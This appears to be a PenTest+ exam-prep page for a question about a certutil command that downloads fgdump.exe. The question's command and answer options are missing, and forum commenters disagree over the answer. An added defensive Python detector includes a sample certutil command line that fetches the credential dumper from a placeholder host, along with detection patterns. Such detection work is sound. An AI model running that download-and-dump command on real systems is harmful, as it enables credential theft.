Exam PT0-002, Question 325

A penetration tester issues the following command after obtaining a shell:

Which of the following describes this technique?

    Correct Answer: B

    The command shown uses 'certutil' to download 'fgdump.exe' from a remote server to the local machine. 'fgdump.exe' is a known tool used for dumping password hashes from the Security Accounts Manager (SAM) database on Windows systems, which is a common step in privilege escalation. The act of downloading and running 'fgdump.exe' is specifically associated with attempting to obtain higher privileges by cracking these hashes, making this technique one of privilege escalation.
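As an added defender-side illustration (not part of the exam page or its discussion), the following Python scans flattened process-creation events for the two things the explanation describes: certutil.exe being used to fetch a file over HTTP, and the credential-dumping tool named in the question being executed. The event lines, the host address and the paths are constructed for the example.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style), flattened
# to one "key=value|key=value" line each. Not real telemetry; 198.51.100.7 is a
# documentation-range address used only as a placeholder.
SAMPLE_EVENTS = [
    "EventID=1|Image=C:\\Windows\\System32\\certutil.exe|CommandLine=certutil -urlcache -split -f http://198.51.100.7/fgdump.exe fgdump.exe|ParentImage=C:\\Windows\\System32\\cmd.exe",
    "EventID=1|Image=C:\\Windows\\System32\\certutil.exe|CommandLine=certutil -verify C:\\certs\\corp.cer|ParentImage=C:\\Windows\\explorer.exe",
    "EventID=1|Image=C:\\Users\\svc\\fgdump.exe|CommandLine=fgdump.exe|ParentImage=C:\\Windows\\System32\\cmd.exe",
    "EventID=1|Image=C:\\Windows\\System32\\notepad.exe|CommandLine=notepad.exe notes.txt|ParentImage=C:\\Windows\\explorer.exe",
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Tool name taken from the question; extend this set with your own watchlist.
CRED_DUMP_TOOLS = {"fgdump.exe"}


def parse_event(line: str) -> dict:
    """Split a flattened 'k=v|k=v' event into a dict; the first '=' separates key and value."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def classify(event: dict) -> list:
    """Return the detection labels that fire for one process-creation event."""
    image = event.get("Image", "").lower()
    cmdline = event.get("CommandLine", "").lower()
    exe = image.rsplit("\\", 1)[-1]          # file name part of the image path
    hits = []
    # certutil.exe is a signed Windows binary; legitimate use (e.g. -verify) carries no URL.
    if exe == "certutil.exe" and ("urlcache" in cmdline or URL_RE.search(cmdline)):
        hits.append("lolbin_ingress_tool_transfer")
    # Either executing the dumper or naming it on a command line (download target) is of interest.
    if exe in CRED_DUMP_TOOLS or any(tool in cmdline for tool in CRED_DUMP_TOOLS):
        hits.append("credential_dump_tool")
    return hits


def scan(lines) -> dict:
    """Map the index of every alerting line to the labels that fired for it."""
    results = {}
    for index, line in enumerate(lines):
        hits = classify(parse_event(line))
        if hits:
            results[index] = hits
    return results


if __name__ == "__main__":
    for index, labels in scan(SAMPLE_EVENTS).items():
        print(index, labels)
```

Only the download event and the later execution of the dumper alert; the routine certificate check on the same binary does not.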

Discussion
Obiwan123 (Option: D)

Yeti87 is wrong

FasterN8 (Option: B)

certutil is native, but fgdump is not. This is trying to crack passwords to get more privileges.

MalikMak (Option: D)

Living-off-the-land (LotL) techniques involve the use of native tools available on the system to conduct operations typically performed by attackers. This can include moving laterally through a network, executing files, or exfiltrating data, all while potentially evading detection.

yeti87 (Option: B)

This command downloads the fgdump.exe tool from the specified URL and saves it locally as fgdump.exe. fgdump.exe is a popular tool used for privilege escalation on Windows systems. It is often used to dump password hashes from the SAM (Security Accounts Manager) database, which can then be cracked offline to obtain plaintext passwords. Therefore, this technique is associated with privilege escalation as it aims to obtain sensitive information (password hashes) that could potentially lead to escalated privileges within the system.